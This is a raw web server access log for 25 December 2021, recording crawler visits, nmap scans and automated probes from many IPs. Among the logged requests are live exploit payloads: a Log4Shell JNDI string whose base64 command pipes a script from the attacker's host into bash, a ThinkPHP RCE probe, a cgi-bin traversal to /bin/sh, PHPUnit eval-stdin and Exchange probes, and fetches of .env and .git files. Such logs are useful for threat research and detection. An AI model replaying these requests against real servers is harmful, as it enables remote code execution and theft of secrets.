[25/Dec/2021:01:05:38 +0100] 139.162.145.250 TLSv1.2 AES256-SHA "GET /bag2 HTTP/1.1" 304
[25/Dec/2021:02:14:36 +0100] 35.88.234.87 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[25/Dec/2021:02:14:53 +0100] 35.88.102.157 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 302
[25/Dec/2021:02:14:56 +0100] 35.88.102.157 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[25/Dec/2021:02:14:57 +0100] 34.211.210.78 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[25/Dec/2021:02:15:08 +0100] 34.219.162.25 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 302
[25/Dec/2021:02:15:13 +0100] 34.219.162.25 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 295
[25/Dec/2021:02:25:19 +0100] 34.96.130.6 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 394
[25/Dec/2021:04:15:31 +0100] 104.206.128.30 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 374
[25/Dec/2021:04:54:47 +0100] 131.220.6.152 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[25/Dec/2021:05:04:43 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[25/Dec/2021:05:25:13 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 331
[25/Dec/2021:06:12:02 +0100] 193.118.55.170 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[25/Dec/2021:06:13:48 +0100] 35.233.62.116 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[25/Dec/2021:06:36:42 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 390
[25/Dec/2021:07:16:07 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /CSS/Miniweb.css HTTP/1.1" 398
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1" 925
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /Portal0000.htm HTTP/1.1" 397
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /xO4a HTTP/1.1" 387
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /Portal/Portal.mwsl HTTP/1.1" 401
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /home.cgi HTTP/1.1" 391
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /nmaplowercheck1640412967 HTTP/1.1" 407
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /sdk HTTP/1.1" 386
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 394
[25/Dec/2021:07:16:08 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /scripts/WPnBr.dll HTTP/1.1" 400
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /__Additional HTTP/1.1" 395
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 424
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.git/HEAD HTTP/1.1" 392
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /docs/cplugError.html/ HTTP/1.1" 404
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD / HTTP/1.1" -
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /server-status HTTP/1.1" 396
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /localstart.cgi HTTP/1.1" 397
[25/Dec/2021:07:16:09 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:07:16:10 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /pools/default/buckets HTTP/1.1" 404
[25/Dec/2021:07:16:10 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /HNAP1 HTTP/1.1" 388
[25/Dec/2021:07:16:10 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 424
[25/Dec/2021:07:16:10 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:07:16:10 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /main.cgi HTTP/1.1" 391
[25/Dec/2021:07:16:10 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /pools HTTP/1.1" 388
[25/Dec/2021:07:16:11 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:07:16:11 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /default.cfm HTTP/1.1" 394
[25/Dec/2021:07:16:11 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /localstart.cfm HTTP/1.1" 397
[25/Dec/2021:07:16:12 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[25/Dec/2021:07:16:13 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /indice.shtml HTTP/1.1" 395
[25/Dec/2021:07:16:13 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /default.shtml HTTP/1.1" 396
[25/Dec/2021:07:16:14 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /readme.txt HTTP/1.1" 393
[25/Dec/2021:07:16:18 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[25/Dec/2021:07:16:19 +0100] 172.105.87.91 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:07:27:32 +0100] 207.46.13.233 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[25/Dec/2021:07:27:34 +0100] 207.46.13.233 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 311
[25/Dec/2021:07:27:43 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[25/Dec/2021:07:33:12 +0100] 192.241.214.20 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[25/Dec/2021:08:04:15 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /mifs/.;/services/LogService HTTP/1.1" 318
[25/Dec/2021:09:17:21 +0100] 192.241.211.138 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[25/Dec/2021:09:27:20 +0100] 192.241.196.36 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[25/Dec/2021:09:43:57 +0100] 66.249.64.66 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 308
[25/Dec/2021:09:43:59 +0100] 66.249.64.95 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[25/Dec/2021:09:44:27 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 315
[25/Dec/2021:10:40:27 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /_ignition/execute-solution HTTP/1.1" 319
[25/Dec/2021:12:30:49 +0100] 193.118.53.210 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[25/Dec/2021:13:00:13 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 293
[25/Dec/2021:13:53:42 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[25/Dec/2021:13:55:31 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[25/Dec/2021:13:55:32 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /nmaplowercheck1640436931 HTTP/1.1" 407
[25/Dec/2021:13:55:32 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /sdk HTTP/1.1" 386
[25/Dec/2021:13:55:32 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 424
[25/Dec/2021:13:55:32 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.git/HEAD HTTP/1.1" 392
[25/Dec/2021:13:55:32 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:13:55:32 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /scripts/WPnBr.dll HTTP/1.1" 400
[25/Dec/2021:13:55:32 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /Portal/Portal.mwsl HTTP/1.1" 401
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1" 925
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /CSS/Miniweb.css HTTP/1.1" 398
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /gQp4 HTTP/1.1" 387
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /pools/default/buckets HTTP/1.1" 404
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /nmaplowercheck1640436932 HTTP/1.1" 407
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /docs/cplugError.html/ HTTP/1.1" 404
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:13:55:33 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 424
[25/Dec/2021:13:55:34 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:13:55:34 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /server-status HTTP/1.1" 396
[25/Dec/2021:13:55:34 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /localstart.jsa HTTP/1.1" 397
[25/Dec/2021:13:55:34 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /pools HTTP/1.1" 388
[25/Dec/2021:13:55:34 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /HNAP1 HTTP/1.1" 388
[25/Dec/2021:13:55:35 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /index.html HTTP/1.1" 393
[25/Dec/2021:13:55:35 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 394
[25/Dec/2021:13:55:35 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD / HTTP/1.1" -
[25/Dec/2021:13:55:35 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /__Additional HTTP/1.1" 395
[25/Dec/2021:13:55:36 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /index.jhtml HTTP/1.1" 394
[25/Dec/2021:13:55:36 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:13:55:36 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /base.jsa HTTP/1.1" 391
[25/Dec/2021:13:55:37 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /index.aspx HTTP/1.1" 393
[25/Dec/2021:13:55:38 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /localstart.shtml HTTP/1.1" 399
[25/Dec/2021:13:55:39 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /main.cgi HTTP/1.1" 391
[25/Dec/2021:13:55:40 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /main.asp HTTP/1.1" 391
[25/Dec/2021:13:55:41 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[25/Dec/2021:13:55:42 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /start.jsp HTTP/1.1" 392
[25/Dec/2021:13:55:43 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.0" 388
[25/Dec/2021:13:55:44 +0100] 45.33.65.249 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:14:21:09 +0100] 195.54.160.149 TLSv1.2 AES256-SHA "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC84Ni41OS4xMTMuMTAyOjQ0Myl8YmFzaA==} HTTP/1.1" 435
[25/Dec/2021:14:32:43 +0100] 192.241.209.218 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[25/Dec/2021:14:43:53 +0100] 128.1.248.42 TLSv1.2 DHE-RSA-AES256-SHA256 "GET / HTTP/1.1" 301
[25/Dec/2021:16:41:40 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[25/Dec/2021:16:41:40 +0100] 109.237.103.123 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[25/Dec/2021:17:27:12 +0100] 92.118.160.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 391
[25/Dec/2021:17:48:12 +0100] 40.77.167.42 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 304
[25/Dec/2021:18:00:41 +0100] 192.99.18.122 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 298
[25/Dec/2021:18:55:41 +0100] 92.118.160.5 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 377
[25/Dec/2021:19:02:45 +0100] 192.241.212.44 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[25/Dec/2021:19:04:14 +0100] 192.241.212.131 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[25/Dec/2021:19:05:16 +0100] 192.241.209.65 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[25/Dec/2021:19:41:18 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[25/Dec/2021:19:41:27 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[25/Dec/2021:19:41:31 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[25/Dec/2021:19:41:32 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[25/Dec/2021:19:41:35 +0100] 185.165.190.34 TLSv1.2 AES256-SHA "quit" 379
[25/Dec/2021:19:41:36 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[25/Dec/2021:19:41:36 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394
[25/Dec/2021:19:41:37 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[25/Dec/2021:19:41:39 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309
[25/Dec/2021:19:41:41 +0100] 185.165.190.34 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[25/Dec/2021:20:15:13 +0100] 167.94.138.58 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[25/Dec/2021:21:45:42 +0100] 109.237.103.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[25/Dec/2021:21:45:43 +0100] 109.237.103.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST /.env HTTP/1.1" 304
[25/Dec/2021:23:59:31 +0100] 92.118.160.61 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 393
[26/Dec/2021:00:15:43 +0100] 91.90.123.71 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "-" -